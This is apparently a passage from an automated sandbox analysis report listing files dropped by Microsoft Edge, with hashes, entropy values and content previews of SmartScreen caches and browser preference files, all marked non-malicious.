                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3581
                                                                                                                                                                  Entropy (8bit):4.459693941095613
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                  MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                  SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                  SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                  SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:topTraffic_638004170464094982

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:uriCache_

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                  Entropy (8bit):5.0160329066530585
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTjFVY4Y:YWLSGTt1o9LuLgfGBPAzkVj/T8ldy4Y
                                                                                                                                                                  MD5:3595396291C90AB4B3E0F64EBA4133B5
                                                                                                                                                                  SHA1:06185E3CCDAE1D1194C580B1292AEB2C0E0D4D57
                                                                                                                                                                  SHA-256:70B9872FF9BE9470EF44497FBEE90DF6F0636065459888E7271F637B6AD06421
                                                                                                                                                                  SHA-512:4078FB15C4CD7F5DA43D3BFEC7F0C1DD47418EC02BA460F58A7B11972745ABFE33201364838296C27B10D37E4B9FDCC6A1A72028959048B3693F329563D7F3E8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736302678555962}]}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):86
                                                                                                                                                                  Entropy (8bit):4.389669793590032
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQOn:YQ3Kq9X0dMgAEiLIMn
                                                                                                                                                                  MD5:03B6D5E81A4DC4D4E6C27BE1E932B9D9
                                                                                                                                                                  SHA1:3C5EF0615314BDB136AB57C90359F1839BDD5C93
                                                                                                                                                                  SHA-256:73B017F7C5ECD629AD41D14147D53F7D3D070C5967E1E571811A6DB39F06EACC
                                                                                                                                                                  SHA-512:0037EB23CCDBDDE93CFEB7B9A223D59D0872D4EC7F5E3CA4F7767A7301E96E1AF1175980DC4F08531D5571AFB94DF789567588DEB2D6D611C57EE4CC05376547
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":15}

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c923803a-933c-46a2-9144-3a6b5e24e88a.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8373
                                                                                                                                                                  Entropy (8bit):5.784066969148297
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:fsNwtBCteiRUdqj/lkCW6qRAq1k8SPxVLZ7VTiQ:fsNwKdYg/2CW6q3QxVNZTiQ
                                                                                                                                                                  MD5:F8891FB010A1F7CACC68AB500DEF709F
                                                                                                                                                                  SHA1:40E8BE7D7337EAD35ED232D09F7B80AE9462EF55
                                                                                                                                                                  SHA-256:072FDD1061E72491A3EA07F0932095BC8DFCBAFAE42690EDCD54DB5D6DCF03B2
                                                                                                                                                                  SHA-512:95C746C8ED0109E9BB036DD6B09E79D7D1E5DB0226E3B5C56BA6910F1114013E76B9610CCEB61C8E7B960BF2F5D9A5FBA10BDD9A70775A30B7079DC2FF760BAE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d0e166d6-45d0-4979-8743-fefba049a66e.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8110
                                                                                                                                                                  Entropy (8bit):5.800596893389728
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:asNAtBCteiRUVfQTkCG6qRAq1k8SPxVLZ7VTiq:asNAKdw4QCG6q3QxVNZTiq
                                                                                                                                                                  MD5:4014F4FCF6D9408D2C5919DC1DE23A0A
                                                                                                                                                                  SHA1:2A8EB58DFF151022C49057265AFBAF504D27B1DA
                                                                                                                                                                  SHA-256:2292410242834994B23BA03EB5C7BC50E3652C9AE034EE8655D6A54F40BEE108
                                                                                                                                                                  SHA-512:2895154F175E85FB1DEFDE498906B8AC683201EB224E4AB299593CD3E3C2BB93EDDF3526AE0022E0E0A740C8F77798546F218D2B39CD1DCFB8B2C1A593E9E719
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d5e3badc-e385-4016-b34a-9fa73921a7d0.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):24958
                                                                                                                                                                  Entropy (8bit):6.030761444552139
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:9MkbJrT8IeQc5w1luQ9P4t/2CwL5uTY3JU:9Mk1rT8HY1gj2FuTT
                                                                                                                                                                  MD5:28AA19E6D4548C1584B26994E71EAA1A
                                                                                                                                                                  SHA1:65DEFCF37D52CB1336CA5796A4CCD9AED7AC97CD
                                                                                                                                                                  SHA-256:09103EC3D905A587EF9CED0F07D9928C272645FAD9EDBA3366588F8B65A1C7EB
                                                                                                                                                                  SHA-512:AE721F03E768CC6D49B48068CBA3034E335DD0F4939FFB01942802BE49894ECBFD01F976C8873484783AA4F99F2702B6FE45C5AE05E9C5AB509B818DB9AC4481
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e171dd2e-0705-4361-b3a1-77b4a81d1697.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8278
                                                                                                                                                                  Entropy (8bit):5.480598478434951
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uVgXqsNk5hsGKf1BCg5ih/cIyURLl8Roto24j2lDBE2Vvl6NZjRe4WJkCcIrbtla:uxsNwhEBCdViRUvExXjEkCLMT2WQ/a
                                                                                                                                                                  MD5:1EFC9CCBFD90C24E699B6F853D4238C1
                                                                                                                                                                  SHA1:266DE0186620B900A37986F446C22D4876EB410F
                                                                                                                                                                  SHA-256:A146BD15C0749D9322DC7C9336518F272746DE3F542A9EEDB5C15CB755AF9B2E
                                                                                                                                                                  SHA-512:763EE323389B3EAEF760D06E5393CF21D33CD10E74D2E22E4C6828E8690D6853D161CB776367990B8156551C39BB84DAC3210D856A7E7459ADFA7DAE5DBC374A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380675475054861","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAAMAAAAAAAAAAAA=","dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"edge_standalone_sid

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\fb5e98e1-614e-4643-b7a9-673f73a473c0.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:modified
